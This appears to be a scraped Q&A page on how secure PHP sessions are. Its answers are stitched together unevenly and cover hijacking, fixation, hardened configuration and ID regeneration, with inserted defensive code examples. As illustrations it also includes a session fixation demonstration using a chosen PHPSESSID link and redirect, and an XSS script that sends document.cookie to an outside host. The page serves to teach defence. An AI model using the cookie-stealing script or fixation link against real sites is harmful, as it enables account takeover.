How secure are PHP sessions?

Asked
Active 3 hr before
Viewed 126 times

7 Answers

sessions secure
90%

So, in short: PHP sessions are as secure as your use of them makes them be. This is true for any session-cookie-based system I know of.

PHP sessions are only as secure as your application makes them. PHP sessions will give the user a pseudorandom string ("session ID") for them to identify themselves with, but if that string is intercepted by an attacker, the attacker can pretend to be that user.

Trusting only a session cookie (and only the existence of a session cookie) seems not to go very far security-wise to me, no matter where this session cookie comes from - PHP or elsewhere.

Ensures any sessions created are actually valid, so you can trust a prefix (e.g., if the prefix is $userId-)

Here is an example of the usage:

<?php
session_start();
// $hash is the stored password hash for the user being authenticated
if (password_verify($_POST['password'], $hash)) {
   $_SESSION['auth'] = true;
}
?>

The session can then be accessed across the site to check to see if the user has been authenticated.

<?php
session_start();
// true only after the login handler above has verified the password
if ($_SESSION['auth']) {
   echo "You are logged in!";
}
?>
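The login and check from this answer, worked into one complete flow as an added example (not the answer's own code): the session ID is regenerated at the moment of login so that an ID the client held before authenticating never becomes an authenticated one, the authenticated state carries a server-side expiry instead of relying on cookie lifetime, and logout clears both the server record and the cookie. `find_password_hash()` is an assumed stand-in for the application's user store; the request values at the bottom are constructed for the demo.

```php
<?php
// Added example: complete login / check / logout around PHP sessions.
// find_password_hash() is an assumed stand-in for a real user store.
declare(strict_types=1);

function find_password_hash(string $username): ?string
{
    // Assumed stand-in: a real application loads this from its database.
    $users = ['alice' => password_hash('correct horse battery staple', PASSWORD_DEFAULT)];
    return $users[$username] ?? null;
}

function login(string $username, string $password): bool
{
    $hash = find_password_hash($username);
    if ($hash === null || !password_verify($password, $hash)) {
        return false;
    }
    // Discard the pre-login ID (and its record) so a fixated ID is never authenticated.
    session_regenerate_id(true);
    $_SESSION['auth']      = true;
    $_SESSION['user']      = $username;
    $_SESSION['auth_time'] = time();
    return true;
}

function is_authenticated(int $maxAge = 3600): bool
{
    if (empty($_SESSION['auth']) || empty($_SESSION['user'])) {
        return false;
    }
    // Expire the authenticated state on the server, not just via the cookie's lifetime.
    if (time() - (int) ($_SESSION['auth_time'] ?? 0) > $maxAge) {
        logout();
        return false;
    }
    return true;
}

function logout(): void
{
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        // Expire the session cookie in the browser as well as destroying the record.
        $p = session_get_cookie_params();
        setcookie(session_name(), '', time() - 42000, $p['path'], $p['domain'], $p['secure'], $p['httponly']);
    }
    session_destroy();
}

// Usage on a login endpoint; the fallback values are constructed for the demo.
session_start();
if (login($_POST['username'] ?? 'alice', $_POST['password'] ?? 'correct horse battery staple')) {
    echo 'Logged in as ' . $_SESSION['user'] . ', authenticated=' . var_export(is_authenticated(), true) . "\n";
} else {
    echo "Login failed\n";
}
```

Every other page then calls `session_start()` followed by `is_authenticated()`; the check reads only values the login handler wrote, so a visitor who merely carries a session cookie is not treated as logged in.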
88%

PHP Sessions security issues

And then, there are security issues.

We will see what the potential vulnerabilities are, and PHP session security best practices.

HyperText Transfer Protocol started off as a stateless protocol. This means that every request to the server is self-contained, it carries all the context that the server needs to serve the requested web page. Every message that the client sends to the server can be processed on its own – the server does not maintain the state, nor information about the connection.

PHP as a web programming language belongs to the application layer. PHP builds on HTTP cookies to provide a mechanism to maintain context across multiple requests. For this, it combines a custom, specific cookie header with its own session handler class:

SessionHandler implements SessionHandlerInterface, SessionIdInterface {
   /* Methods */
   public close(): bool
   public create_sid(): string
   public destroy(string $id): bool
   public gc(int $max_lifetime): int | bool
   public open(string $path, string $name): bool
   public read(string $id): string
   public write(string $id, string $data): bool
}
72%

session.cookie_httponly should be set to 1. This tells the user's browser not to make this cookie available to JavaScript, which limits the damage of a cross-site scripting attack.

We want to use only cookies.

session.cookie_secure should be set to 1. This tells the user's browser not to send the cookie at all unless over HTTPS.

Session Fixation: By tricking the client into using a session ID known to an attacker, it's possible to impersonate the user later.

Example Configuration

session.save_handler = files
session.use_cookies = 1
session.cookie_secure = 1
session.use_only_cookies = 1
session.cookie_domain = "example.com"
session.cookie_httponly = 1
; the four directives below were removed in PHP 7.1; current releases use
; session.sid_length and session.sid_bits_per_character instead
session.entropy_length = 32
session.entropy_file = /dev/urandom
session.hash_function = sha256
session.hash_bits_per_character = 5
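The same hardening applied at runtime, as an added example (not part of the answer): it is set before `session_start()`, uses the `session.sid_length` and `session.sid_bits_per_character` directives that replaced the removed `entropy_*`/`hash_*` ones in PHP 7.1, adds `session.use_strict_mode` (so an ID the server did not issue is not adopted) and a `SameSite` attribute, and ends with a check that lists any directive still in a weak state. The cookie domain is a constructed value; the array form of `session_set_cookie_params()` needs PHP 7.3 or later.

```php
<?php
// Added example: runtime equivalent of the hardened php.ini block, plus a check.
declare(strict_types=1);

function harden_session_config(string $cookieDomain): void
{
    ini_set('session.use_only_cookies', '1');   // never read the ID from ?PHPSESSID=
    ini_set('session.use_trans_sid', '0');      // never rewrite the ID into links
    ini_set('session.use_strict_mode', '1');    // reject IDs the server did not generate
    ini_set('session.sid_length', '48');        // 48 chars x 6 bits = 288 bits of ID
    ini_set('session.sid_bits_per_character', '6');
    session_set_cookie_params([
        'lifetime' => 0,          // session cookie, dropped when the browser closes
        'path'     => '/',
        'domain'   => $cookieDomain,
        'secure'   => true,       // only sent over HTTPS
        'httponly' => true,       // not visible to document.cookie
        'samesite' => 'Lax',      // not attached to cross-site POSTs
    ]);
}

// Returns a list of findings; an empty list means the checked directives are as wanted.
function session_config_problems(): array
{
    $problems = [];
    $must = [
        'session.use_only_cookies' => '1',
        'session.use_strict_mode'  => '1',
        'session.cookie_secure'    => '1',
        'session.cookie_httponly'  => '1',
        'session.use_trans_sid'    => '0',
    ];
    foreach ($must as $key => $want) {
        $is = (string) ini_get($key);
        if ($is !== $want) {
            $problems[] = "$key should be $want, is '$is'";
        }
    }
    $samesite = session_get_cookie_params()['samesite'] ?? '';
    if (!in_array($samesite, ['Lax', 'Strict'], true)) {
        $problems[] = 'session cookie has no SameSite attribute';
    }
    return $problems;
}

harden_session_config('example.com');   // constructed domain
$problems = session_config_problems();
echo $problems ? implode("\n", $problems) . "\n" : "session configuration OK\n";
```

Running the check before `harden_session_config()` on a stock php.ini reports `session.cookie_secure`, `session.cookie_httponly` and the missing `SameSite` attribute, which is a quick way to confirm what a deployment actually applies rather than what its config file says.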
65%

PHP Sessions are often taken for granted. A session is a magic array which persists across page loads and holds user-specific data. It’s a fantastic and integral part of most web applications. But when misused, sessions can cause substantial security holes, performance and scalability problems, and data corruption. A deep understanding of sessions is vital to production web development in PHP.

[…] PHP Sessions in Depth […]

There are four main ways an attacker can steal a user’s PHP session ID.

You don’t want session data to be lost when adding or removing servers.

Listing 1

<?php
session_start();

// first visit: initialise the per-user counter
if (!isset($_SESSION['counter'])) {
   $_SESSION['counter'] = 0;
}

$_SESSION['counter']++;
echo $_SESSION['counter'];
75%

PHP sessions are only as secure as your application makes them. PHP sessions will give the user a pseudorandom string ("session ID") for them to identify themselves with, but if that string is intercepted by an attacker, the attacker can pretend to be that user.

Avoids user sharing session ID accidentally by sharing a URL with the session ID in it

Periodically regenerate the session ID and invalidate old session IDs shortly after regenerating

Prevents the session ID from appearing in a Referer header

40%

If the session identifier is regenerated every time there is a change in the level of privilege, the risk of session fixation is practically eliminated:

PHP generates a very random session identifier, so prediction is not a practical risk. Capturing a session identifier is more common—minimizing the exposure of the session identifier, using SSL, and keeping up with browser vulnerabilities can help you mitigate the risk of capture.

Visit this URL using a different computer, or at least a different browser, and include the same session identifier in the URL:

While this convenience is helpful, it is important to realize that it is not a complete solution. There is no inherent security in PHP’s session mechanism, aside from the fact that the session identifier it generates is sufficiently random, thereby eliminating the practicality of prediction. You must provide your own safeguards to protect against all other session attacks. I will show you a few problems and solutions in this chapter.

    <a href="http://example.org/index.php?PHPSESSID=1234">Click Here</a>

    <?php

    header('Location: http://example.org/index.php?PHPSESSID=1234');

    ?>

    <?php

    session_start();

    $_SESSION['username'] = 'chris';

    ?>

    http://example.org/fixation.php?PHPSESSID=1234

    $ cat /tmp/sess_1234
    username|s:5:"chris";

    <?php

    session_start();

    if (isset($_SESSION['username'])) {
       echo $_SESSION['username'];
    }

    ?>

    http://example.org/test.php?PHPSESSID=1234

    <?php

    session_start();

    // first request of this session: replace the (possibly attacker-chosen) ID
    if (!isset($_SESSION['initiated'])) {
       session_regenerate_id();
       $_SESSION['initiated'] = TRUE;
    }

    ?>

    <?php

    // assumes session_start() has already been called; check_login() is the
    // application's own credential check
    $_SESSION['logged_in'] = FALSE;

    if (check_login()) {
       session_regenerate_id();
       $_SESSION['logged_in'] = TRUE;
    }

    ?>
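This answer regenerates the ID at a privilege change; the 75% answer above adds "periodically regenerate the session ID and invalidate old session IDs shortly after regenerating". An added example covering both (it is not Shiflett's code and not from either answer): the ID is replaced on a timer, the superseded record is kept for a short grace period so a request that raced the rotation still completes, but it is marked, and anyone presenting it after the grace period gets an empty session under a fresh ID. `ROTATE_AFTER` and `GRACE_PERIOD` are assumed values; the function must run before any output, right after `session_start()`.

```php
<?php
// Added example: timed session ID rotation with a grace period for the old ID.
declare(strict_types=1);

const ROTATE_AFTER = 15 * 60;  // seconds an ID may live before it is replaced
const GRACE_PERIOD = 60;       // seconds a replaced ID is still honoured

// Call immediately after session_start(). Returns what happened, for logging.
function enforce_session_rotation(): string
{
    $now = time();

    if (isset($_SESSION['destroyed'])) {
        if ((int) $_SESSION['destroyed'] + GRACE_PERIOD < $now) {
            // A superseded ID presented well after its replacement was issued:
            // trust nothing in it and start an empty session under a new ID.
            $_SESSION = [];
            session_regenerate_id(true);
            $_SESSION['created'] = $now;
            return 'stale-id-rejected';
        }
        return 'grace';   // a straggling request inside the grace period
    }

    if (!isset($_SESSION['created'])) {
        $_SESSION['created'] = $now;
        return 'new';
    }
    if ((int) $_SESSION['created'] + ROTATE_AFTER > $now) {
        return 'kept';
    }

    // Mark the current record as superseded and commit so the mark is in
    // storage before the new ID exists, then reopen the same session.
    $oldId = session_id();
    $_SESSION['destroyed'] = $now;
    session_commit();
    session_id($oldId);
    session_start();

    // New ID with a copy of the data. The old record is left in place (with
    // its mark) until garbage collection or the stale-id check above removes it.
    session_regenerate_id(false);
    unset($_SESSION['destroyed']);
    $_SESSION['created'] = $now;
    return 'rotated';
}

ini_set('session.use_strict_mode', '1');
session_start();
echo enforce_session_rotation(), ' ', session_id(), "\n";
```

A request that lands in the grace period writes its changes to the old record rather than the new one, which is the trade-off for not breaking concurrent requests; for data that must not be lost that way, do the write under the new ID or keep it out of the session.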
22%

When you are using sessions, PHP will most often store a cookie on the client computer called PHPSESSID (can be changed by you). This cookie will hold a value, a session identifier, which is associated with some sort of data on the server. If the user has a valid session ID then the data associated with the session will get into the $_SESSION super-global array. Sessions can also be transferred via the URL. In that case it would be something like ?PHPSESSID=id_here.

Sessions and cookies are also two things where you have to watch out. Although they cannot breach your application's security they can be used to compromise user accounts.

By doing this, they can get cookies for other browsing sessions. After that, it is possible to get private information from cookies, and sometimes even the session ID. Then, lots of illegal actions can be executed through it.

There are many ways to get a session ID; for example, if you develop a forum and you don't check user inputs, malicious users will load a script in the forum like this

<script>
   document.location = 'http://www.yourforum.com/cgi-bin/cookie.php?' +
      document.cookie;
</script>